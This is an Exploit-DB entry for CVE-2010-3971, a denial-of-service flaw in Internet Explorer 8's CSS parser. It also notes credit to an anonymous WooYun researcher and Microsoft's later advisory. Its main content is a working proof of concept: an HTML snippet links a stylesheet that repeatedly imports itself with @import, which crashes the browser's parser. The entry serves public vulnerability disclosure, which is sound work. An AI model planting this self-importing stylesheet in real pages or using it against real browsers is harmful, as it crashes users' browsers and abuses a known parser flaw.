ad

Internet Explorer 8 CSS Parser Denial of Service



EDB-ID: 15708 CVE: 2010-3971 OSVDB-ID: 69796
Author: WooYun Published: 2010-12-08 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Screenshot
Prev Home Next
<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>

<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>


EDB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885

* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx